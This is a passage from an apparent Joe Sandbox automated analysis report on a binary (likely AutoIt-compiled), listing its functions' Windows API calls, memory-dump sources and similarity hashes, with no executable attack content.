                                                              • EnterCriticalSection.KERNEL32(?), ref: 00AF9924
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00AF999E
                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AF99B3
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF99D2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 2537439066-0
                                                              • Opcode ID: 46d69ad8600afc412b44c558f40f130e7f8a720b03a7a16a7663396b75ff73bf
                                                              • Instruction ID: f7336789add33acd8cd385b43029e5b32488ff8991ff59ed36ca3199b883bc51
                                                              • Opcode Fuzzy Hash: 46d69ad8600afc412b44c558f40f130e7f8a720b03a7a16a7663396b75ff73bf
                                                              • Instruction Fuzzy Hash: 3E318131A00105AFDB10DFA9DD85EAFB7B9FF45710B2580A9F904AB256DB70DE14CBA0
                                                              Function 00B09B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,00B077F4,?,?,00000000,00000001), ref: 00B09B53
                                                                • Part of subcall function 00B06544: GetWindowRect.USER32(?,?), ref: 00B06557
                                                              • GetDesktopWindow.USER32 ref: 00B09B7D
                                                              • GetWindowRect.USER32(00000000), ref: 00B09B84
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B09BB6
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              • GetCursorPos.USER32(?), ref: 00B09BE2
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B09C44
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: 5f5b44b879d40f638897b3d1e8f8550f27603818f4ff0195b3f512f94f4e4133
                                                              • Instruction ID: fca15fe152a766fd9584bc087fa6d7a237b428c4832f34c96cb978b0abe29151
                                                              • Opcode Fuzzy Hash: 5f5b44b879d40f638897b3d1e8f8550f27603818f4ff0195b3f512f94f4e4133
                                                              • Instruction Fuzzy Hash: 6131CF72604309ABC710DF54DC49F9EBBE9FF89314F00091AF595D7192DA31EA14CB92
                                                              Function 00B1EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00ACAFE3
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACAFF2
                                                                • Part of subcall function 00ACAF83: BeginPath.GDI32(?), ref: 00ACB009
                                                                • Part of subcall function 00ACAF83: SelectObject.GDI32(?,00000000), ref: 00ACB033
                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B1EC20
                                                              • LineTo.GDI32(00000000,00000003,?), ref: 00B1EC34
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1EC42
                                                              • LineTo.GDI32(00000000,00000000,?), ref: 00B1EC52
                                                              • EndPath.GDI32(00000000), ref: 00B1EC62
                                                              • StrokePath.GDI32(00000000), ref: 00B1EC72
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                              • String ID:
                                                              • API String ID: 43455801-0
                                                              • Opcode ID: 6625ad7ca0fb7bac84ceef08fb14c56ece99c1caea2e58a54be537ed7d8290ac
                                                              • Instruction ID: a7ca21204f796ced0d78bfef47d5ce517da18a7d46d061a6fe4419dde4063645
                                                              • Opcode Fuzzy Hash: 6625ad7ca0fb7bac84ceef08fb14c56ece99c1caea2e58a54be537ed7d8290ac
                                                              • Instruction Fuzzy Hash: 6F111E7200014DBFDF019FA4ED88EEA7F6DEB08354F148116BE1896160DB71DD95DBA0
                                                              Function 00AEE19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00AEE1C0
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AEE1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEE1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00AEE1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AEE1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 00AEE209
                                                                • Part of subcall function 00AE9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00AE9A05,00000000,00000000,?,00AE9DDB), ref: 00AEA53A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: af0a4b893f20678afeb766f76dce56c5e5a4a8117aeaff454a40a29226f9eec8
                                                              • Instruction ID: d94b88f9ec0aeca2824dbc87443bb0d325cfb5f3e56806a2912383282726ca7f
                                                              • Opcode Fuzzy Hash: af0a4b893f20678afeb766f76dce56c5e5a4a8117aeaff454a40a29226f9eec8
                                                              • Instruction Fuzzy Hash: 4C018FB5A00754BFEB109BA69C46B5EBFB8EB48751F104066FE08A7290DA709C01CBA0
                                                              Function 00AD7B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00AD7B47
                                                                • Part of subcall function 00AD123A: __initp_misc_winsig.LIBCMT ref: 00AD125E
                                                                • Part of subcall function 00AD123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AD7F51
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AD7F65
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AD7F78
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AD7F8B
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AD7F9E
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AD7FB1
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AD7FC4
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AD7FD7
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AD7FEA
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AD7FFD
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AD8010
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AD8023
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AD8036
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AD8049
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AD805C
                                                                • Part of subcall function 00AD123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AD806F
                                                              • __mtinitlocks.LIBCMT ref: 00AD7B4C
                                                                • Part of subcall function 00AD7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00B6AC68,00000FA0,?,?,00AD7B51,00AD5E77,00B66C70,00000014), ref: 00AD7E41
                                                              • __mtterm.LIBCMT ref: 00AD7B55
                                                                • Part of subcall function 00AD7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AD7B5A,00AD5E77,00B66C70,00000014), ref: 00AD7D3F
                                                                • Part of subcall function 00AD7BBD: _free.LIBCMT ref: 00AD7D46
                                                                • Part of subcall function 00AD7BBD: DeleteCriticalSection.KERNEL32(00B6AC68,?,?,00AD7B5A,00AD5E77,00B66C70,00000014), ref: 00AD7D68
                                                              • __calloc_crt.LIBCMT ref: 00AD7B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00AD7BA3
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: 873a5c0eaa7e50454403905df86f5e3334a81794231da90105329a0aab7ae205
                                                              • Instruction ID: e3ac465f24003e7a534082eb8c244a00c714247da85d4640406efe5ef8ec0525
                                                              • Opcode Fuzzy Hash: 873a5c0eaa7e50454403905df86f5e3334a81794231da90105329a0aab7ae205
                                                              • Instruction Fuzzy Hash: CCF0903210D7121AEB2D77347E0BA4E37949F01730B200AABF8A3D63E2FF2588414560
                                                              Function 00AB27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB2825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB2830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB2843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB284B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 1e14895e49b7f97820af30084766a04b09a3de127291e5c8bb0ce16b09745b33
                                                              • Instruction ID: 78d76529f3faca708ab986cc3836835a124463a531b826e1a5f454d31c8bc645
                                                              • Opcode Fuzzy Hash: 1e14895e49b7f97820af30084766a04b09a3de127291e5c8bb0ce16b09745b33
                                                              • Instruction Fuzzy Hash: 330167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                              Function 00AF9AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 54c0915f535638d7204cde2f8c2a6ff73f93032e36cee40733cb6bc21e2dc507
                                                              • Instruction ID: e7bdcef59120d1ef6d85fd1431a92d0c43e80519afa404caaee9aaa84d1c03cb
                                                              • Opcode Fuzzy Hash: 54c0915f535638d7204cde2f8c2a6ff73f93032e36cee40733cb6bc21e2dc507
                                                              • Instruction Fuzzy Hash: BF018132142216ABD7252BA4FD48EFFB76AFF88741B14052AF603930A0DF649811DB50
                                                              Function 00AF7BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AF7C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AF7C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00AF7C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF7C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 1866109a2e0494b509704d6f1e45f3e37956f0a8056dff07d7706331f496b42b
                                                              • Instruction ID: 0e5cbc241f369672c07f2ac37de4de958d6898d5b366e90ff1a1ef0a9905e2b7
                                                              • Opcode Fuzzy Hash: 1866109a2e0494b509704d6f1e45f3e37956f0a8056dff07d7706331f496b42b
                                                              • Instruction Fuzzy Hash: 80F03A76241558BBE7215BA2AC0EEEF7B7CEFC6B11F100018FA11A2051DBA05A42D6B5
                                                              Function 00AF9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00AF9A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A5E
                                                                • Part of subcall function 00AF93D1: CloseHandle.KERNEL32(?,?,00AF9A6B,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF93DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF9A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00B25DEE,?,?,?,?,?,00ABED63), ref: 00AF9A78
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 61d3899efe8c746e0973e72f196efec09c3cf1b3846777c228108507d69da090
                                                              • Instruction ID: e9c50e29a3caae325befc3579fe8d3e91870062e735902454ee390d7fd556604
                                                              • Opcode Fuzzy Hash: 61d3899efe8c746e0973e72f196efec09c3cf1b3846777c228108507d69da090
                                                              • Instruction Fuzzy Hash: 92F0A732141211ABD7112BA4FC8DEFF773AFF84341B240425F603960A0DFB59811DB51
                                                              Function 00AB1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • __swprintf.LIBCMT ref: 00AB1EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB1D49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              • Opcode ID: 41990b94af061f17a585dd4db98c8f5ee9ae6516c8dd8c4e4b761affd91493a0
                                                              • Instruction ID: efbaaedf7fba71c766d516544afcc958604f22d927b36d64ae1ac805f50f4b78
                                                              • Opcode Fuzzy Hash: 41990b94af061f17a585dd4db98c8f5ee9ae6516c8dd8c4e4b761affd91493a0
                                                              • Instruction Fuzzy Hash: 4D916B711042119FC724EF24DA96DAEBBE8FF95700F40495DF895972A2DB70ED04CB92
                                                              Function 00B0AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 00B0B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B0B115
                                                              • VariantClear.OLEAUT32(?), ref: 00B0B298
                                                                • Part of subcall function 00AF9DC5: VariantInit.OLEAUT32(00000000), ref: 00AF9E05
                                                                • Part of subcall function 00AF9DC5: VariantCopy.OLEAUT32(?,?), ref: 00AF9E0E
                                                                • Part of subcall function 00AF9DC5: VariantClear.OLEAUT32(?), ref: 00AF9E1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 4a1d5d92fb439977f93b18d721e8cb2a50d00376d342ac06819b5959f4b9279a
                                                              • Instruction ID: dd7aace5a8f79c105ee4f8443dbe3a15590fab84139369681e54e09e55544148
                                                              • Opcode Fuzzy Hash: 4a1d5d92fb439977f93b18d721e8cb2a50d00376d342ac06819b5959f4b9279a
                                                              • Instruction Fuzzy Hash: A8916D706083019FCB10DF24C595D9ABBF8EF89714F1449ADF89A9B3A2DB31E905CB52
                                                              Function 00AF5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00ACC6F4: _wcscpy.LIBCMT ref: 00ACC717
                                                              • _memset.LIBCMT ref: 00AF5438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00AF5467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AF5513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AF553D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: d6faadd4326fb206ff7e4c5ca99a4d893ad1c50a39cf64a616198e6ad50b7166
                                                              • Instruction ID: 7cc1b9aedb87f86c26c952dac72548a01d130f4ffbccbf8e018315e6153a0225
                                                              • Opcode Fuzzy Hash: d6faadd4326fb206ff7e4c5ca99a4d893ad1c50a39cf64a616198e6ad50b7166
                                                              • Instruction Fuzzy Hash: 6D512371A047099BD7149BBCC9417BBBBE9AF85324F040A2EFB99D3191DB60CD44CB52
                                                              Function 00AF0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AF027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AF02B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AF02C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AF0344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
